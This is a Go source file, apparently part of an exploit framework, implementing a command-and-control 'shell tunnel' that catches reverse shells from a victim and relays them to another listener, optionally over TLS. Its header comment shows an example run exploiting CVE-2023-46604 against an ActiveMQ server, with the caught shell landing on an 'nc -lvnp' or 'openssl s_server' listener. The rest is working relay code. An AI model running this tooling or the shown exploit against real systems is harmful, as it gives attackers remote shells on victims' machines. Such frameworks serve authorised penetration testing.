// Package shelltunnel is a simple C2 that copies shell traffic between a reverse shell origin and
// a connectback server. It essentially allows for this setup:
//
// | Box 1 |                       |     Box 2    |                      |    Box 3     |
// | nc -l | <- shell traffic ->   | shell tunnel | <- shell traffic ->  | shell origin |
//
// Where 'nc -l' is basically any C&C you want that accepts reverse shells, box 2 is the attacker
// box, and box 3 is the victim. In this example, go-exploit on box 2 (attacker box) can act as
// an egress for the reverse shell generated on the victim (box 3). The shell tunnel will just
// copy the traffic data between the two boxes (1 & 3). This is appealing over something like a socks5
// proxy or more advanced tunneling because it simply works and requires, for the exploit dev,
// no extra work beyond generating the initial shell (via *ShellServer or a binary or whatever).
//
// Usage example using an unencrypted reverse shell:
//
//	albinolobster@mournland:~/initial-access/feed/cve-2023-46604$ ./build/cve-2023-46604_linux-arm64 -e -rhost 10.9.49.56 -lhost 10.9.49.192 -lport 1270 -httpAddr 10.9.49.192 -c2 ShellTunnel -shellTunnel.cbHost 10.9.49.12
//	time=2024-10-28T15:05:21.600-04:00 level=STATUS msg="Starting listener on 10.9.49.192:1270"
//	time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.56 port=61616 ssl=false "ssl auto"=false
//	time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.192:1270"
//	time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="HTTP server listening for 10.9.49.192:8080/TMURWfRGRdSZ"
//	time=2024-10-28T15:05:23.603-04:00 level=STATUS msg=Connecting...
//	time=2024-10-28T15:05:23.630-04:00 level=STATUS msg="Sending exploit"
//	time=2024-10-28T15:05:23.656-04:00 level=STATUS msg="Sending payload"
//	time=2024-10-28T15:05:23.675-04:00 level=STATUS msg="Sending payload"
//	time=2024-10-28T15:05:23.757-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.56:48440"
//	time=2024-10-28T15:05:23.758-04:00 level=SUCCESS msg="Connect back to 10.9.49.12:1270 success!"
//	time=2024-10-28T15:05:28.633-04:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
//
// Above, you can see we've exploited a remote ActiveMQ (10.9.49.56), caught a reverse shell, and connected it back to a listener
// at 10.9.49.12:1270. The shell there looks like this:
//
//	parallels@ubuntu-linux-22-04-02-desktop:~$ nc -lvnp 1270
//	Listening on 0.0.0.0 1270
//	Connection received on 10.9.49.192 51478
//	pwd
//	/opt/apache-activemq-5.15.2
//
// The tunnel can also support catching and relaying TLS (or a mix of either). For example, the above can be updated like so:
//
//	./build/cve-2023-46604_linux-arm64 -e -rhost 10.9.49.56 -lhost 10.9.49.192 -lport 1270 -httpAddr 10.9.49.192 -c2 ShellTunnel -shellTunnel.cbHost 10.9.49.12 -shellTunnel.cbSSL -shellTunnel.sslListen
//
// And the reverse shell can now be caught by openssl:
//
//	parallels@ubuntu-linux-22-04-02-desktop:~$ openssl s_server -quiet -key key.pem -cert cert.pem -port 1270
//	pwd
//	/opt/apache-activemq-5.15.2
package shelltunnel

import (
	"crypto/tls"
	"errors"
	"flag"
	"fmt"
	"io"
	"net"
	"strconv"
	"strings"
	"sync/atomic"
	"time"

	"github.com/vulncheck-oss/go-exploit/c2/channel"
	"github.com/vulncheck-oss/go-exploit/encryption"
	"github.com/vulncheck-oss/go-exploit/output"
	"github.com/vulncheck-oss/go-exploit/protocol"
)

// Server is the ShellTunnel C2. It holds the listener that accepts incoming
// connections together with the connect-back and TLS settings. The exported
// configuration fields are bound to command line flags by CreateFlags; the
// Listener and the channel are populated by Init.
type Server struct {
	// The listener that accepts all incoming connections. Init creates it as a
	// plain TCP listener, or as a TLS listener when SSLShellServer is set.
	Listener net.Listener

	// The server address/hostname to tunnel the data to.
	ConnectBackHost string

	// The server port to tunnel the data to.
	ConnectBackPort int

	// Indicates if we should use an encrypted tunnel to the server.
	ConnectBackSSL bool

	// Indicates if we should be listening as an SSL server.
	SSLShellServer bool

	// The file path to the user provided private key (if provided).
	PrivateKeyFile string

	// The file path to the user provided certificate (if provided).
	CertificateFile string

	// Underlying C2 channel with metadata and session tracking. Nil until Init
	// stores one.
	channel *channel.Channel
}

var (
	// serverSingleton is the package-wide Server handed out by GetInstance.
	serverSingleton *Server

	// ErrTLSListener is the sentinel wrapped into every error returned by
	// createTLSListener, so callers can match it with errors.Is.
	ErrTLSListener = errors.New("tls listener init")
)

// GetInstance returns the package-level Server, allocating it the first time
// it is requested. The lazy allocation is not synchronized.
func GetInstance() *Server {
	if serverSingleton != nil {
		return serverSingleton
	}
	serverSingleton = new(Server)

	return serverSingleton
}

// CreateFlags registers the shellTunnel.* options on the process-wide flag
// set and binds each one directly to the matching Server field.
func (shellTunnel *Server) CreateFlags() {
	cmdLine := flag.CommandLine

	// where the caught shell gets relayed to
	cmdLine.StringVar(&shellTunnel.ConnectBackHost, "shellTunnel.cbHost", "", "The server to tunnel the data back to")
	cmdLine.IntVar(&shellTunnel.ConnectBackPort, "shellTunnel.cbPort", 1270, "The server port to tunnel the data back to")
	cmdLine.BoolVar(&shellTunnel.ConnectBackSSL, "shellTunnel.cbSSL", false, "Indicates if the connect-back should use SSL/TLS")

	// only relevant when the local listener should speak SSL/TLS
	cmdLine.BoolVar(&shellTunnel.SSLShellServer, "shellTunnel.sslListen", false, "Indicates if we should listen as an SSL/TLS server")
	cmdLine.StringVar(&shellTunnel.PrivateKeyFile, "shellTunnel.PrivateKeyFile", "", "A private key to use when being an SSL server")
	cmdLine.StringVar(&shellTunnel.CertificateFile, "shellTunnel.CertificateFile", "", "The certificate to use when being an SSL server")
}

// Init validates the ShellTunnel configuration and starts the listener that
// reverse shells will connect to.
//
// The channel supplies the listen address (IPAddr/Port) and the shared
// shutdown flag; if the flag has not been allocated yet it is created here so
// manually configured C2s do not have to define it. The listener is TLS when
// SSLShellServer is set and plain TCP otherwise.
//
// It returns true once the listener is up. On any failure (nil channel, client
// mode, missing connect-back host or port, listener creation error) the reason
// is printed as a framework error and false is returned.
func (shellTunnel *Server) Init(channel *channel.Channel) bool {
	if channel == nil {
		output.PrintFrameworkError("ShellTunnel was initialized without a channel")

		return false
	}
	if channel.Shutdown == nil {
		// Initialize the shutdown atomic. This lets us not have to define it if the C2 is manually
		// configured. The zero value of atomic.Bool is false.
		channel.Shutdown = new(atomic.Bool)
	}
	shellTunnel.channel = channel
	if channel.IsClient {
		output.PrintFrameworkError("Called ShellTunnel as a client. Use lhost and lport.")

		return false
	}
	if shellTunnel.ConnectBackHost == "" {
		output.PrintFrameworkError("Failed to provide a connect back host")

		return false
	}
	if shellTunnel.ConnectBackPort == 0 {
		output.PrintFrameworkError("Failed to provide a connect back port")

		return false
	}

	output.PrintfFrameworkStatus("Starting listener on %s:%d", channel.IPAddr, channel.Port)

	var err error
	if shellTunnel.SSLShellServer {
		shellTunnel.Listener, err = shellTunnel.createTLSListener(channel)
	} else {
		// JoinHostPort brackets IPv6 literals; plain host+":"+port concatenation
		// produces an address net.Listen cannot parse for them.
		listenAddr := net.JoinHostPort(channel.IPAddr, strconv.Itoa(channel.Port))
		shellTunnel.Listener, err = net.Listen("tcp", listenAddr)
	}

	if err != nil {
		output.PrintFrameworkError("Couldn't create the server: " + err.Error())

		return false
	}

	return true
}

// Shutdown removes every tracked session from the channel and closes the
// listener. It always returns true.
//
// It is a no-op when no channel has been stored yet. The listener is also
// checked for nil: Init stores the channel before it validates the
// configuration and creates the listener, so a failed Init leaves a channel
// but no listener, and closing a nil listener would panic.
func (shellTunnel *Server) Shutdown() bool {
	ch := shellTunnel.Channel()
	// Account for non-running case
	if ch == nil {
		return true
	}
	output.PrintFrameworkStatus("C2 received shutdown, killing server and client sockets for shell tunnel")

	// Ranging over an empty or nil collection is a no-op, so no length check is needed.
	// NOTE(review): RemoveSession is presumably what closes the underlying
	// connection; confirm against the channel package.
	for k, session := range ch.Sessions {
		output.PrintfFrameworkStatus("Connection closed: %s", session.RemoteAddr)
		ch.RemoveSession(k)
	}

	if shellTunnel.Listener != nil {
		// Best effort: the listener may already have been closed by an earlier
		// shutdown, in which case the error carries no useful information.
		_ = shellTunnel.Listener.Close()
	}

	return true
}

// Channel returns the C2 channel stored by Init. It is nil until Init has
// stored one.
func (shellTunnel *Server) Channel() *channel.Channel {
	return shellTunnel.channel
}

// Run accepts incoming shells and hands each one to handleTunnelConn until the
// listener is closed or the channel's shutdown flag is set. It blocks for the
// lifetime of the server.
//
// timeout is the number of seconds to wait for a first session; if none has
// been registered by then the shutdown flag is raised. A second goroutine
// polls the shutdown flag and calls Shutdown once it flips, which closes the
// listener and thereby unblocks Accept.
func (shellTunnel *Server) Run(timeout int) {
	// terminate the server if no shells come in within timeout seconds
	go func() {
		time.Sleep(time.Duration(timeout) * time.Second)
		if !shellTunnel.Channel().HasSessions() {
			output.PrintFrameworkError("Timeout met. Shutting down shell listener.")
			shellTunnel.Channel().Shutdown.Store(true)
		}
	}()
	// watch the shutdown flag and tear the server down once it is raised
	go func() {
		for {
			if shellTunnel.Channel().Shutdown.Load() {
				shellTunnel.Shutdown()

				break
			}
			time.Sleep(10 * time.Millisecond)
		}
	}()

	// Accept arbitrary connections. In the future we need something for the
	// user to select which connection to make active
	for {
		client, err := shellTunnel.Listener.Accept()
		if err != nil {
			// A closed listener is the normal way out of this loop, so it is not
			// reported. net.ErrClosed is the sentinel for that condition; the string
			// match is kept as a fallback for listeners that do not wrap it.
			listenerClosed := errors.Is(err, net.ErrClosed) ||
				strings.Contains(err.Error(), "use of closed network connection")
			if !listenerClosed {
				output.PrintFrameworkError(err.Error())
			}

			return
		}
		if shellTunnel.Channel().Shutdown.Load() {
			// This connection was accepted after shutdown was requested. It has not
			// been registered as a session, so nothing else would ever close it.
			_ = client.Close()

			return
		}
		output.PrintfFrameworkSuccess("Caught new shell from %v", client.RemoteAddr())
		// ShellTunnel is a bit of an outlier as we need to track the incoming connections and also the
		// tunneled connections. This will allow for cleanup of connections on both ends of the pipe,
		// but may not be immediately clear.
		shellTunnel.Channel().AddSession(&client, client.RemoteAddr().String())
		go handleTunnelConn(client, shellTunnel.ConnectBackHost, shellTunnel.ConnectBackPort, shellTunnel.ConnectBackSSL, shellTunnel.channel)
		time.Sleep(10 * time.Millisecond)
	}
}

// createTLSListener starts a TLS listener on the channel's IPAddr and Port.
//
// When both CertificateFile and PrivateKeyFile are set the key pair is loaded
// from disk; otherwise a certificate is generated via
// encryption.GenerateCertificate. Every returned error wraps ErrTLSListener.
func (shellTunnel *Server) createTLSListener(channel *channel.Channel) (net.Listener, error) {
	var ok bool
	var err error
	var certificate tls.Certificate
	if len(shellTunnel.CertificateFile) != 0 && len(shellTunnel.PrivateKeyFile) != 0 {
		certificate, err = tls.LoadX509KeyPair(shellTunnel.CertificateFile, shellTunnel.PrivateKeyFile)
		if err != nil {
			return nil, fmt.Errorf("%s %w", err.Error(), ErrTLSListener)
		}
	} else {
		output.PrintFrameworkStatus("Certificate not provided. Generating a TLS Certificate")
		certificate, ok = encryption.GenerateCertificate()
		if !ok {
			return nil, fmt.Errorf("GenerateCertificate failed %w", ErrTLSListener)
		}
	}

	output.PrintfFrameworkStatus("Starting TLS listener on %s:%d", channel.IPAddr, channel.Port)

	// JoinHostPort brackets IPv6 literals, which a plain "%s:%d" format does not.
	listenAddr := net.JoinHostPort(channel.IPAddr, strconv.Itoa(channel.Port))
	tlsConfig := &tls.Config{
		Certificates: []tls.Certificate{certificate},
		// We have no control over the SSL versions supported on the remote target. Be permissive for more
		// targets. crypto/tls no longer implements SSLv3, so TLS 1.0 is the lowest floor that can actually
		// be negotiated; the deprecated tls.VersionSSL30 constant selected the same set of versions.
		MinVersion: tls.VersionTLS10,
	}

	listener, err := tls.Listen("tcp", listenAddr, tlsConfig)
	if err != nil {
		return nil, fmt.Errorf("%s %w", err.Error(), ErrTLSListener)
	}

	return listener, nil
}

// handleTunnelConn relays traffic between a caught shell and the connect-back
// server until either side stops.
//
// clientConn is the accepted shell connection; host, port and ssl describe the
// connect-back server to dial; ch is the channel used for session tracking and
// for signalling shutdown. Both connections are closed when the function
// returns. Shutdown is flagged as soon as the first copy direction ends, or
// when the connect-back fails while this is the only tracked session.
func handleTunnelConn(clientConn net.Conn, host string, port int, ssl bool, ch *channel.Channel) {
	defer clientConn.Close()

	// attempt to connect back to the server. MixedConnect is both proxy aware and can
	// produce an ssl or unencrypted connection so works pretty nice here
	serverConn, ok := protocol.MixedConnect(host, port, ssl)
	if !ok {
		// This is a bit of a hack as the type of C2 callbacks is not tracked and we will have 1
		// in the sessions from the client call. This checks if it's 1 or less and if it is then it
		// will drop future conns.
		if len(ch.Sessions) <= 1 {
			output.PrintfFrameworkError("Failed to connect back to %s:%d closing server", host, port)
			ch.Shutdown.Store(true)

			return
		}
		output.PrintfFrameworkError("Failed to connect back to %s:%d", host, port)

		return
	}
	defer serverConn.Close()

	ch.AddSession(&serverConn, serverConn.RemoteAddr().String())
	output.PrintfFrameworkSuccess("Connect back to %s:%d success!", host, port)

	// Buffered for both copiers: only the first completion is received below, so
	// with an unbuffered channel the second goroutine would block on its send
	// forever and leak.
	done := make(chan struct{}, 2)

	// copy between the two endpoints until one dies
	go func() {
		_, _ = io.Copy(serverConn, clientConn)
		done <- struct{}{}
	}()

	go func() {
		_, _ = io.Copy(clientConn, serverConn)
		done <- struct{}{}
	}()

	<-done
	// Trigger shutdown after the first connection is dropped. In a future where multiple are handled
	// this might not be ideal. Revisit this when that time comes.
	ch.Shutdown.Store(true)
}
